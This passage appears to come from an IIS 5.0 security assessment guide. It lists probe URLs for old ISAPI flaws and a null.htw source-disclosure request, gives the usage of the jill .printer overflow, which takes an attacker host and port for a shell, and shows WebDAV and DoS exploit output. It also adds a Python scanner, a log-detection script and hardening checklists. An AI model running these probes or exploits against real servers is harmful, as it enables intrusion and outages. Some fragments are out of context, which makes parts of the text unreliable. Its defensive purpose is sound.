A.1.1 Summary

Extension | Requirement / functionality | Vulnerability | Reference | Prerequisite | Request | Expected response | Search
.asp | ASP and HTTP related functionality | Buffer overflows | MS02-018 | - | GET /default.asp | 200 OK | www.Microsoft.com
.htr | Password reset | Reveals source code | MS01-004 | - | /default.asp+.htr | - | www.Microsoft.com
.idc | Internet Database Connector | Reveals directory path | - | - | /null.idc | 500 error | www.Microsoft.com
.stm, .shtm, .shtml | Server Side Include | Remote buffer overflow | Q193689 | Requested file must be present | /<file>.stm, .shtm, .shtml | 200 OK | www.Microsoft.com
.printer | Internet Printing | Remote buffer overflow | MS01-023 (cumulative patch MS01-044) | - | /null.printer | 500 Internal Server Error | www.Microsoft.com
.htw | Hit-highlighting of text in a web page | Reveals source code | MS00-006 | Index Server | /null.htw | 200 OK, "The format of QUERY_STRING is invalid" | www.Microsoft.com
.ida, .idq | Index Server | Remote buffer overflow; reveals directory path | MS01-033 | Index Server | /null.ida, /null.idq | 200 OK, "The IDQ file ... could not be found." | www.Microsoft.com
FrontPage | FrontPage Server Extensions 2000, Visual Studio RAD support | Remote buffer overflow | MS01-035 | FrontPage Server Extensions | /_vti_bin/_vti_aut/fp30reg.dll | 501 Not Implemented | www.Microsoft.com
WebDAV | WebDAV | Remote exploit | The exploit is available at www.k-otik.com | SEARCH method is allowed | canned exploit (see A.1.3.1) | "Successful, attempting to join shell ..." | www.k-otik.com
WebDAV | WebDAV | Remote DoS attack | www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-018.asp | - | canned exploit (see A.1.4) | "Server is DoSsed! Now run !! F-B-eyee is after j00..." | www.k-otik.com

Notes on the table: a 404 for any of the /null.* requests means the script mapping has been removed and the check is negative; a 500 or a handler-specific error text means the ISAPI DLL is still mapped and answered the request, which is what each row tests. The bulletin references are placed by the vulnerability they patch: MS01-023 is the .printer ISAPI overflow (MS01-044 is the cumulative patch that also includes it), MS00-006 is the .htw hit-highlighting disclosure, and MS01-033 is the Index Server .ida/.idq ISAPI overflow.
http://www.target.com/abc.idc
This results in the full physical path being disclosed, which can be used to find further holes:
C:\inetpub\wwwroot\abc.idc not found
The same applies to the Index Server extensions; request any non-existent .idq or .ida file and you will get the path:
http://www.target.com/def.idq
http://www.target.com/ghi.ida
Prerequisites:
IIS 5.0 without any service pack.
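The following script is an added example, not part of the OISSG document: it encodes the /null.* probe rows of the summary table and the .idc/.idq/.ida path-disclosure check above as data, and matches a response against the expected status and handler text. The HTTP transport is kept separate from the matching, so the logic can be exercised offline against constructed responses. The probe list, the constructed response bodies, and the http_transport helper are assumptions made for the example; the physical-path extraction is the only part that reads anything from the server's text.

```python
import http.client
import re
from dataclasses import dataclass
from typing import Callable, List, Optional, Tuple


@dataclass(frozen=True)
class Probe:
    name: str                   # extension or feature, as in the summary table
    path: str                   # request path from the table
    reference: str              # Microsoft bulletin reference
    expect_status: int          # status the table lists when the mapping is live
    body_marker: Optional[str]  # text that confirms the ISAPI handler answered
    finding: str                # what a matching response indicates


# Transcribed from the summary table (assumption: one GET per mapping is enough).
# A 404 means the script mapping is gone and is treated as "not mapped".
PROBES: List[Probe] = [
    Probe(".idc", "/null.idc", "(none)", 500, "not found",
          "Internet Database Connector mapped; error reveals physical path"),
    Probe(".printer", "/null.printer", "MS01-023", 500, None,
          "Internet Printing ISAPI mapped; remote buffer overflow"),
    Probe(".htw", "/null.htw", "MS00-006", 200, "format of QUERY_STRING is invalid",
          "webhits.dll mapped; hit-highlighting source disclosure"),
    Probe(".idq", "/null.idq", "MS01-033", 200, "could not be found",
          "Index Server ISAPI mapped; remote buffer overflow, path disclosure"),
    Probe("fp30reg.dll", "/_vti_bin/_vti_aut/fp30reg.dll", "MS01-035", 501, None,
          "FrontPage RAD support DLL present; remote buffer overflow"),
]

# A Windows drive path such as C:\inetpub\wwwroot\null.idc leaked in error text.
WIN_PATH_RE = re.compile(r"[A-Za-z]:\\[^\s\"'<>]+")


@dataclass
class Finding:
    probe: Probe
    status: int
    physical_path: Optional[str]


def extract_physical_path(body: str) -> Optional[str]:
    m = WIN_PATH_RE.search(body)
    return m.group(0) if m else None


def evaluate(probe: Probe, status: int, body: str) -> Optional[Finding]:
    """Return a Finding if the response matches the table's indicator, else None."""
    if status != probe.expect_status:
        return None
    if probe.body_marker and probe.body_marker.lower() not in body.lower():
        return None
    return Finding(probe, status, extract_physical_path(body))


Transport = Callable[[str], Tuple[int, str]]


def run_probes(transport: Transport, probes: List[Probe] = PROBES) -> List[Finding]:
    findings: List[Finding] = []
    for p in probes:
        status, body = transport(p.path)
        f = evaluate(p, status, body)
        if f is not None:
            findings.append(f)
    return findings


def http_transport(host: str, port: int = 80, timeout: float = 5.0) -> Transport:
    """Real GET transport for use against a test box you are authorised to scan."""
    def get(path: str) -> Tuple[int, str]:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
        try:
            conn.request("GET", path, headers={"Host": host})
            resp = conn.getresponse()
            return resp.status, resp.read(65536).decode("latin-1", "replace")
        finally:
            conn.close()
    return get


# Constructed responses (not captured from a real server) standing in for an
# unpatched IIS 5.0 on which .printer has been unmapped but the rest is live.
CONSTRUCTED = {
    "/null.idc": (500, "C:\\inetpub\\wwwroot\\null.idc not found"),
    "/null.printer": (404, "Object Not Found"),
    "/null.htw": (200, "The format of QUERY_STRING is invalid."),
    "/null.idq": (200, "The IDQ file C:\\inetpub\\wwwroot\\null.idq could not be found."),
    "/_vti_bin/_vti_aut/fp30reg.dll": (501, "Not Implemented"),
}


def constructed_transport(path: str) -> Tuple[int, str]:
    return CONSTRUCTED.get(path, (404, "Object Not Found"))


if __name__ == "__main__":
    for f in run_probes(constructed_transport):
        extra = f"  [path: {f.physical_path}]" if f.physical_path else ""
        print(f"{f.probe.name:12} {f.status} {f.probe.reference:9} {f.probe.finding}{extra}")
```

To run it against a lab host, replace constructed_transport with http_transport("host"). The body markers are deliberately short substrings so that localised or slightly different error pages still match; tighten them if you see false positives.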
A.1.2.8
NULL.HTW
This vulnerability can give the source code of a server-side ASP page. The ASP page could
give valuable information like usernames and passwords.
http://www.target.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full
CiWebhitsfile, CiRestriction and CiHiliteType are the three variables of null.htw, and null.htw
takes input from the user on these three variables. CiWebhitsfile names the file to be disclosed; as
a result you will get the source code of the default.asp file.
Prerequisites:
1. Index Server
2. The .htw script mapping to webhits.dll (the file null.htw itself does not need to exist)
A.1.2.9
WEBHITS.DLL
A.1.3 Buffer overflow
A.1.3.1 WEBDAV REMOTE ROOT EXPLOIT
If IIS 5.0 is unpatched, there is a good chance that a simple overflow will give the attacker
root (SYSTEM) access. The exploit written by Schizoprenic is available on www.k-otik.com. It is a
canned exploit again, and if your exploit's output gives you something like
Successful, attempting to join shell ...
that means the server is vulnerable. The administrator's first priority shall be to apply the
patch on the affected server.
A.1.3.3 JILL
jill is written in UNIX C and can also be compiled using Cygwin for Windows 2000.
$ gcc -o jill jill.c
This binary can be run either from the Cygwin shell or from a Win32 console if
cygwin1.dll is in the path.
$ ./jill
iis5 remote .printer overflow.
dark spyrit <dspyrit@beavuh.org> / beavuh labs.
usage: ./jill <targetHost> <targetPort> <attackerHost> <attackerPort>
A.1.4 DoS
As pointed out by SPI Dynamics, a vulnerability in IIS 5.0 and IIS 5.1 can lead to
Denial of Service. The worst part is that it is remote and causes the server to restart. The
proof-of-concept exploit is available at www.k-otik.com. It is a canned exploit, so do not use it
on your production server. The exploit works as below:
#./iisdos
Usage : <I.P./Hostname>
#./iisdos 172.16.169.17
Server is DoSsed! Now run !! F-B-eyee is after j00...
This shows that my server 172.16.169.17 is vulnerable and needs to be patched.
after path checking rather than before. In this unicode representation, it is possible to
use "../" to back up into the system directory and feed the input to the command shell.
A.2 REFERENCE
http://archives.neohapsis.com/archives/ntbugtraq/2000-q4/0029.html
Step: Consider the security of the environment.
Notes: DMZ, networking, border router, app server, database server, etc.

Step: Use checklist and tools from the software provider.
Notes: e.g. unused IIS ISAPI DLLs.

Checklist:
o ... privileged.
o Enable only essential Web Service Extensions.
o Place content on a dedicated disk volume, without administrative utilities!!
o Configure NTFS permissions.
o Configure IIS Web Site permissions.
o Configure IIS logging, preferably in W3C format.
o Configure ... certificate server.
o Install and configure a virus protection solution.
o Install and configure a host-based IDS.
o Secure well-known accounts: appropriate authentication, assign complex passwords, disabled, change the account description.
o Execute the applications with the protection of IIS 6.0 (note: default IIS 4.0/5.0).
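The logging item above is only useful if someone reads the logs, so here is an added example (not from the OISSG document) that parses IIS W3C extended log lines and flags the probe requests catalogued in A.1.1: the /null.* ISAPI probes, the fp30reg.dll request, and WebDAV methods such as the SEARCH method the remote exploit needs. The sample log is constructed, and the rule names, the PROPFIND entry and the field list are assumptions for the example; the parsing follows the W3C format's #Fields directive, with spaces inside a value written as '+' as IIS does.

```python
import re
from collections import Counter
from typing import Dict, Iterable, Iterator, List, Optional, Pattern, Set, Tuple

# Detection rules for the probes in this document: (name, regex on cs-uri-stem
# or None, set of methods or None). Rule names are assumptions for the example.
RULES: List[Tuple[str, Optional[Pattern[str]], Optional[Set[str]]]] = [
    ("Internet Printing .printer probe (MS01-023)", re.compile(r"\.printer$", re.I), None),
    ("Index Server .ida/.idq probe (MS01-033)", re.compile(r"\.id[aq]$", re.I), None),
    ("Hit-highlighting .htw probe (MS00-006)", re.compile(r"\.htw$", re.I), None),
    ("IDC path disclosure probe", re.compile(r"\.idc$", re.I), None),
    ("FrontPage fp30reg.dll probe (MS01-035)", re.compile(r"/_vti_aut/fp30reg\.dll$", re.I), None),
    # WebDAV methods; the remote exploit in the table needs SEARCH to be allowed.
    ("WebDAV method", None, {"SEARCH", "PROPFIND"}),
]


def parse_w3c(lines: Iterable[str]) -> Iterator[Dict[str, str]]:
    """Yield one dict per record, keyed by the names in the last #Fields directive.
    IIS writes space-separated fields and replaces spaces inside a value with '+',
    so a plain split is correct; records of the wrong width are skipped rather
    than mis-aligned."""
    fields: List[str] = []
    for raw in lines:
        line = raw.rstrip("\r\n")
        if not line:
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue
        values = line.split(" ")
        if not fields or len(values) != len(fields):
            continue
        yield dict(zip(fields, values))


def classify(rec: Dict[str, str]) -> Optional[str]:
    stem = rec.get("cs-uri-stem", "")
    method = rec.get("cs-method", "").upper()
    for name, rx, methods in RULES:
        if rx is not None and rx.search(stem):
            return name
        if methods is not None and method in methods:
            return name
    return None


def detect(lines: Iterable[str]) -> List[Dict[str, str]]:
    hits: List[Dict[str, str]] = []
    for rec in parse_w3c(lines):
        rule = classify(rec)
        if rule is not None:
            hits.append({
                "time": f"{rec.get('date', '')} {rec.get('time', '')}",
                "client": rec.get("c-ip", ""),
                "method": rec.get("cs-method", ""),
                "uri": rec.get("cs-uri-stem", ""),
                "status": rec.get("sc-status", ""),
                "rule": rule,
            })
    return hits


def hits_per_client(hits: List[Dict[str, str]]) -> Dict[str, int]:
    """Count flagged requests per source address; one client hitting several
    rules in a short window is the scanner pattern worth paging on."""
    return dict(Counter(h["client"] for h in hits))


# Constructed sample log (not a real capture) in IIS W3C extended format.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2004-03-01 10:00:00
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2004-03-01 10:00:01 10.0.0.5 GET /default.asp - 200 Mozilla/4.0+(compatible)
2004-03-01 10:00:02 10.0.0.9 GET /null.printer - 500 -
2004-03-01 10:00:03 10.0.0.9 GET /null.idq - 200 -
2004-03-01 10:00:04 10.0.0.9 GET /null.htw CiWebhitsfile=/default.asp%20&CiRestriction=none&CiHiliteType=full 200 -
2004-03-01 10:00:05 10.0.0.9 GET /_vti_bin/_vti_aut/fp30reg.dll - 501 -
2004-03-01 10:00:06 10.0.0.9 SEARCH / - 411 -
2004-03-01 10:00:07 10.0.0.5 GET /images/logo.gif - 200 Mozilla/4.0+(compatible)
"""

if __name__ == "__main__":
    found = detect(SAMPLE_LOG.splitlines())
    for h in found:
        print(f"{h['time']} {h['client']:10} {h['method']:6} {h['uri']:32} {h['status']} {h['rule']}")
    print(hits_per_client(found))
```

Point detect() at an open log file to run it over a real ex*.log; the status column is kept in each hit because a 500 on /null.printer or a 200 on /null.idq tells you the mapping was still live when the probe arrived, not just that someone tried.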
A.3.2 References
Hardening IIS 5.0
http://www.shebeen.com/w2k
http://www.microsoft.com/technet/prodtechnol/windows2000serv/technologies/iis/deploy/depovg/securiis.mspx
http://www.microsoft.com/technet/prodtechnol/windows2000serv/technologies/iis/tips/iis5chk.mspx
2004, Balwant Rathore, Open Information Systems Security Group (www.oissg.org)
Date: 11/16/2016
Harden web-server
o Web-server hosts must be updated with the latest security fixes for the
operating system and web server software.
o Remove all non-essential files such as phf from the scripts directory /cgi-bin.
o Remove all sample directories and pages that are shipped with web servers.
o The damage that a successful attacker can inflict can be further limited by
running the web server in a chroot-ed environment. The Unix chroot system
call changes the root directory of a process, such that the process can
then no longer access any of the files above the specified root directory in
the filesystem hierarchy. All web pages and configuration files need to be
in the chroot directory. Note that chroot is not a boundary for a process
that keeps root privileges: the server must drop to an unprivileged user after
the chroot call, and the jail must not contain setuid binaries.
o Run the FTP server in a separate chrooted part of the directory tree that is
different from that of the web server.
o For the Windows platform, limit the top-level root directory to an isolated
directory structure with strict permissions configured.
o ... other system processes. This will contain attacks and prevent damage
to web servers.
o Mission-critical web sites should have multiple servers on to which the
load is distributed. This will make it difficult to hog the performance of the
server, thereby reducing the chances of performance-based denial of
service attacks. It also adds redundancy.